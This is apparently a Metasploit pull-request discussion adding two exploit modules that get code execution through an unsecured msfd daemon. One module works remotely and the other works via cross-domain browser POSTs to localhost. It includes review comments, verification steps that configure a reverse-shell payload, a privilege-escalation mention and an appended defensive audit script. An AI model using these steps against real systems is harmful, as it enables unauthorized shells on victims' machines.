Module msfd rce (remote and through browser) #9908
Thanks for writing this! When changing this stuff, keep in mind that changes to documentation will generally apply to both documents.
```
def initialize(info = {})
  super(update_info(info,
    'Name' => 'Metasploit msfd Remote Code Execution',
```
You may want to change this so it doesn't get confused with your other module (which has the same name).
Something like "Metasploit msfd Remote Code Execution Via Browser" would probably be fine.
this module places the payload in the POST-data. These POST-requests can be sent cross-domain and can therefore be sent to localhost on the victim's machine. The msfconsole-command to execute code is 'rbi -e "CODE"'.
A note that only IE works for exploitation on Windows would be good somewhere here.
```
def exploit
  connect
  data = sock.get_once
```
Why do you need this variable? You're not using it anywhere in the method.
This module has been tested on the following targets:

* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
If it affects older versions of metasploit, write < 4.16.51
I've tried to clarify on this point. Pretty much all versions are vulnerable, but I have only tested the targets listed.
To start the vulnerable service, run:

```
$ msfd -f -q
```
This should probably be moved down to the Verification Steps section.
**REMOTE_PORT**

Remote port
This should probably be more specific
Thanks for the review, I've updated according to your comments.
Hey @rstenvi, thanks for the modules! I'm testing them out locally, and running into an issue with payload encoding. You've defined But it seems that this prevents the verification steps from succeeding. In my testing, the
Why are we failing to encode the payload? Attempting to generate the payload separately using
Note the second-to-last line, which reports that the payload generation failed because of the inability to avoid the While I think we could stand to improve Could you confirm if the verification steps work for you?
#6714 may be relevant for context.
@rstenvi : Outstanding! Two contributions for the price of one. 😄 Just a note here that #9900 has been landed separately:
With the new payload modification, this exploit module worked perfectly for me, so I've merged it into
Release Notes
The exploits/multi/misc/msfd_rce_remote and exploits/multi/browser/msfd_rce_browser modules have been added to the framework. Both modules use an unsecured msfd daemon to get a shell on your target. Use the exploits/multi/misc/msfd_rce_remote module if the msfd-program is exposed on an external interface. Use the exploits/multi/browser/msfd_rce_browser module to send network requests to localhost via the target's browser.
This PR adds two modules for exploiting Metasploit's msf daemon. The Metasploit team was contacted privately first and they confirmed that this is not a vulnerability, but intended behavior. These two modules are dependent on PR 9900 and will not work without it.
This PR adds two modules because they target the same functionality, but through different methods. The first method can be used if the msfd-program is exposed on an external interface and the second method uses the victim's browser to send network requests to localhost.
Verification

Verification steps for module msfd_rce_remote:

```
msfd -q -f -a 0.0.0.0
msfconsole
use exploit/multi/misc/msfd_rce_remote
set rhost IP
set rport PORT
set payload ruby/shell_reverse_tcp
set lhost IP
set lport PORT
exploit
```
The above module could also be used for privilege escalation, see steps in the documentation for how this can be done.
Verification steps for module msfd_rce_browser:

```
msfd -q -f
msfconsole
use exploit/multi/browser/msfd_rce_browser
set remote_ip IP
set remote_port PORT
set payload ruby/shell_reverse_tcp
set lhost IP
set lport PORT
exploit
```
Both exploits have been tested and verified to work on Linux and Windows, but msfd_rce_browser is unreliable on Windows. The exploit rarely worked when Firefox or Chrome was used and only worked in IE when the -q flag was sent to msfd. On Linux I had no issues.
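As an added example (not code from this PR or from Metasploit), a small audit script that finds msfd listeners in `ss -ltnp` output and reports whether the daemon is bound to loopback or, as with `msfd -a 0.0.0.0`, to an external address. It assumes msfd's default port is 55554 (an assumption, adjustable via the `port` parameter) and runs on a constructed sample of `ss` output.

```python
import ipaddress
import re

# Default msfd port assumed here (an assumption, not stated in the PR);
# pass a different `port` if the daemon was started with another one.
MSFD_DEFAULT_PORT = 55554

# Constructed sample of `ss -ltnp` output (not captured from a real host).
# msfd is a Ruby script, so its listener shows up under the "ruby" process name.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    127.0.0.1:55554    0.0.0.0:*         users:(("ruby",pid=4242,fd=9))
LISTEN 0      128    0.0.0.0:55554      0.0.0.0:*         users:(("ruby",pid=4343,fd=9))
LISTEN 0      4096   [::]:22            [::]:*            users:(("sshd",pid=901,fd=3))
"""

LISTEN_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def classify_address(addr):
    """Return 'loopback' or 'external' for a local address as printed by ss."""
    if addr == '*':  # older ss prints '*' for the wildcard address
        return 'external'
    ip = ipaddress.ip_address(addr.strip('[]').split('%')[0])
    return 'loopback' if ip.is_loopback else 'external'


def find_msfd_listeners(ss_output, port=MSFD_DEFAULT_PORT):
    """Parse `ss -ltnp` text and return (pid, address, exposure) per listener
    on the msfd port. 'external' means reachable over the network; a
    'loopback' listener is still reachable by a browser on the same host
    sending cross-origin POST requests to localhost, as this PR describes."""
    findings = []
    for line in ss_output.splitlines():
        m = LISTEN_RE.match(line)
        if not m or int(m.group('port')) != port:
            continue
        addr = m.group('addr')
        findings.append((int(m.group('pid')), addr, classify_address(addr)))
    return findings


if __name__ == '__main__':
    for pid, addr, exposure in find_msfd_listeners(SAMPLE_SS_OUTPUT):
        print(f'pid {pid} listening on {addr}:{MSFD_DEFAULT_PORT} ({exposure})')
```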